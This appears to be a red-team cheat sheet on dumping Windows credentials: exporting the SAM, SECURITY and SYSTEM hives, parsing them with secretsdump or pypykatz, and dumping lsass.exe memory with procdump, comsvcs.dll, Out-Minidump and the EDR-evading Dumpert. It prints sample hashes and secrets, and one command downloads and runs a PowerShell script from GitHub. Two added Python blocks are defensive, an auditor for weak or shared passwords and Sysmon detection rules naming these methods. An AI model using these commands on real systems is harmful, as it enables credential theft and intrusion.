How to dump creds for offline analysis (lsass, sam, lsa secret, cached domain, …)

Registry Hives (SAM/LSA Secrets/Cached Domain)

Dump the hives on the Windows machine (requires local admin)

reg.exe save hklm\sam %TEMP%\sam.save
reg.exe save hklm\security %TEMP%\security.save
reg.exe save hklm\system %TEMP%\system.save

With secretsdump (Impacket), parse the saved hives offline

$ ./secretsdump.py -sam /tmp/dump/sam.save -security /tmp/dump/security.save -system /tmp/dump/system.save LOCAL
Impacket v0.9.21.dev1+20200225.153700.afe746d2 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x3e62535704cdbf03f05168d943856689
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
john.adm:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:fc4ff20fd7d08f3f00edbca1bc29d7a0:::
user:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
user1:1020:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
limited:1021:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xf12c15bfbe9cedca364296f5c758b7c8f3029261
dpapi_userkey:0x644ac66a4694f6bad0c5d9d7d745dbc7053ca4d5
[*] NL$KM 
 0000   5D C6 38 68 30 2D 33 67  AF FE C4 F1 02 D9 1A 95   ].8i0-3g........
 0010   54 A2 44 96 20 CA 7A A1  85 05 E5 D2 6B 40 56 C9   T.D. .z.....k@V.
 0020   F6 EC E6 ED 5F FC 77 48  4E 30 D9 A3 40 E7 01 E2   ...._.wHN0..@...
 0030   4C 51 C3 F3 2B 07 5E 0B  2C 8C CE 6A 70 0F 6E E8   LQ....^.,..jp.n.
NL$KM:5dc63869302d1367affec4f102d91a9554a2449620ca7aa18505e5d26b4056c1f6ece1ed3ffc77484e30d9a340e701e24c51c3f31b075e0b2c8cce6a700f6ee8
[*] _SC_PDQInventory 
(Unknown User):Password1
[*] Cleaning up... 
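The SAM lines above follow the `uid:rid:lmhash:nthash:::` format that both secretsdump and pypykatz emit. The following added example (not part of the original page or of Impacket) parses that format and runs the hygiene checks a defender wants from such a dump: blank passwords, LM hashes still stored, and one password shared by several accounts. The sample input is the SAM section of the output above; the empty-string LM/NT hash constants are the well-known values.

```python
import re
from collections import defaultdict

# Hashes of the empty password: LM (always this value when LM storage is off) and NT.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# secretsdump prints one SAM entry per line as  user:rid:lmhash:nthash:::
SAM_LINE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$")


def parse_sam_lines(text):
    """Return (user, rid, lm, nt) for every hash line; [*] status lines and LSA secrets are skipped."""
    entries = []
    for line in text.splitlines():
        m = SAM_LINE.match(line.strip())
        if m:
            entries.append((m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return entries


def audit_sam(entries):
    """Hygiene findings: blank passwords, LM hashes still stored, one password shared by several accounts."""
    users_by_nt = defaultdict(list)
    for user, _, _, nt in entries:
        users_by_nt[nt].append(user)
    return {
        # a blank NT hash is normal for disabled built-ins (Guest/Invité, DefaultAccount); check enabled accounts
        "blank_password": sorted(u for u, _, _, nt in entries if nt == EMPTY_NT),
        # a real LM hash means the weak LM format is still being stored for that account
        "lm_hash_stored": sorted(u for u, _, lm, _ in entries if lm != EMPTY_LM),
        # identical NT hash means identical password, so one cracked password opens every account listed
        "shared_password": {nt: sorted(us) for nt, us in users_by_nt.items() if len(us) > 1 and nt != EMPTY_NT},
    }


# The SAM section of the secretsdump output above, embedded as sample input.
SAMPLE = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
john.adm:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:fc4ff20fd7d08f3f00edbca1bc29d7a0:::
user:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
user1:1020:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
limited:1021:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
[*] Dumping LSA Secrets
"""

if __name__ == "__main__":
    for finding, value in audit_sam(parse_sam_lines(SAMPLE)).items():
        print(finding, value)
```

On the sample, `john.adm`, `user1` and `limited` share one password and `user` has an enabled account with a blank one; the two disabled built-ins are expected to show the blank hash.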

With pypykatz

Note: install it with pip3 install pypykatz

$ pypykatz registry system.save --sam sam.save --security security.save

lsass.exe

1. Procdump

You can use the PID of the process to avoid some detection.

# find the PID of lsass.exe
C:\Users\user\AppData\Local\Temp>tasklist | findstr /i lsas
lsass.exe                      636 Services                   0    40 748 Ko

# dump by process name
C:\Users\user\AppData\Local\Temp>procdump64.exe -accepteula -ma lsass.exe lsass.dmp

# dump by PID
C:\Users\user\AppData\Local\Temp>procdump64.exe -accepteula -ma 636 636.dmp

ProcDump v9.0 - Sysinternals process dump utility
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[14:29:50] Dump 1 initiated: C:\Users\user\AppData\Local\Temp\636.dmp
[14:29:51] Dump 1 writing: Estimated dump file size is 41 MB.
[14:29:51] Dump 1 complete: 41 MB written in 0.1 seconds
[14:29:51] Dump count reached.
# use with mimikatz
$ mimikatz.exe "sekurlsa::minidump c:\temp\lsass.dmp" "sekurlsa::logonpasswords"

# use with pypykatz
$ pypykatz lsa minidump lsass.dmp

2. comsvcs.dll

Note: You need administrative AND debug privileges to dump with comsvcs.dll. PowerShell has these privileges by default.

# find the PID of lsass.exe
C:\Users\user\AppData\Local\Temp>tasklist | findstr /i lsas
lsass.exe                      636 Services                   0    40 748 Ko

# full memory dump of that PID via the MiniDump export of comsvcs.dll
powershell -c rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 636 %TEMP%\lsass.dmp full

3. Task manager

Open Task Manager as admin, right-click lsass.exe (or "Local Security Authority Process"), choose "Create dump file", done. ¯\_(ツ)_/¯

4. Out-Minidump.ps1

Link: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1

powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); Get-Process lsass | out-minidump"

5. Dumpert

Link: https://github.com/outflanknl/Dumpert

# Output: C:\WINDOWS\Temp\dumpert.dmp
# exe version
C:\WINDOWS\system32> C:\temp\Outflank-Dumpert.exe
 ________          __    _____.__                 __
 \_____  \  __ ___/  |__/ ____\  | _____    ____ |  | __
  /   |   \|  |  \   __\   __\|  | \__  \  /    \|  |/ /
 /    |    \  |  /|  |  |  |  |  |__/ __ \|   |  \    <
 \_______  /____/ |__|  |__|  |____(____  /___|  /__|_ \
         \/                             \/     \/     \/
                                  Dumpert
                               By Cneeliz @Outflank 2019

[1] Checking OS version details:
        [+] Operating System is Windows 10 or Server 2016, build number 18363
        [+] Mapping version specific System calls.
[2] Checking Process details:
        [+] Process ID of lsass.exe is: 928
        [+] NtReadVirtualMemory function pointer at: 0x00007FFDEADBEEF
        [+] NtReadVirtualMemory System call nr is: 0x3f
        [+] Unhooking NtReadVirtualMemory.
[3] Create memorydump file:
        [+] Open a process handle.
        [+] Dump lsass.exe memory to: \??\C:\WINDOWS\Temp\dumpert.dmp
        [+] Dump succesful.

# DLL version (silent, no output)
rundll32.exe  C:\Users\kaluche\Desktop\Dumpert-master\Dumpert-master\Dumpert-DLL\x64\Debug\Outflank-Dumpert-DLL.dll, Dump
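For the blue-team side of the methods listed in this section, here is an added example (not part of the original page or of any of the tools above) that runs simple detection logic over constructed process-creation (Sysmon Event ID 1 / Security 4688) and process-access (Sysmon Event ID 10) events. The command-line rules catch procdump-by-name, the comsvcs.dll MiniDump call and Out-Minidump; the PID-only procdump run and the Task Manager dump leave no tell-tale command line, which is why the example also checks for handles to lsass.exe opened with PROCESS_VM_READ. The event field names follow Sysmon's; the allowlist is a constructed placeholder.

```python
import re

# Command-line indicators for the dump methods listed above (Sysmon Event ID 1 / Security 4688).
CMDLINE_RULES = [
    ("procdump_lsass_by_name", re.compile(r"procdump(?:64)?(?:\.exe)?.*\s-ma\s+lsass(?:\.exe)?\b", re.I)),
    ("comsvcs_minidump", re.compile(r"comsvcs\.dll\s*,?\s*MiniDump\b", re.I)),
    ("powersploit_out_minidump", re.compile(r"Out-Minidump", re.I)),
]
PROCESS_VM_READ = 0x0010  # access bit every memory dump of lsass needs, whatever tool asks for it


def match_cmdline(cmdline):
    """Rule names triggered by a process-creation command line."""
    return [name for name, rx in CMDLINE_RULES if rx.search(cmdline)]


def match_process_access(event, allowlist=("MsMpEng.exe",)):
    """Sysmon Event ID 10: a non-allowlisted process opened lsass.exe with PROCESS_VM_READ.
    Covers the PID-only procdump and the Task Manager dump, which leave no tell-tale command line."""
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return []
    source = event.get("SourceImage", "").rsplit("\\", 1)[-1]
    if source in allowlist:  # constructed allowlist; tune it to the AV/EDR actually deployed
        return []
    granted = int(event.get("GrantedAccess", "0x0"), 16)
    return ["lsass_process_access"] if granted & PROCESS_VM_READ else []


def detect(events):
    """Return, per event, the list of rule names it triggers."""
    results = []
    for ev in events:
        if ev.get("EventID") == 1:
            results.append(match_cmdline(ev.get("CommandLine", "")))
        elif ev.get("EventID") == 10:
            results.append(match_process_access(ev))
        else:
            results.append([])
    return results


# Constructed events modelled on the commands in this section (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 1, "CommandLine": "procdump64.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"EventID": 1, "CommandLine": "procdump64.exe -accepteula -ma 636 636.dmp"},
    {"EventID": 1, "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 636 C:\Temp\lsass.dmp full"},
    {"EventID": 1, "CommandLine": 'powershell.exe -exec Bypass -C "Get-Process lsass | out-minidump"'},
    {"EventID": 10, "SourceImage": r"C:\Temp\procdump64.exe", "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe", "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1410"},
]

if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, detect(SAMPLE_EVENTS)):
        print(hits or "-", ev.get("CommandLine") or ev.get("SourceImage"))
```

The second event (procdump by PID) produces no command-line hit at all; only the Event ID 10 check sees that dump, which is the reason to collect process-access telemetry for lsass.exe rather than rely on command lines alone.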

NTDS.dit

Todo …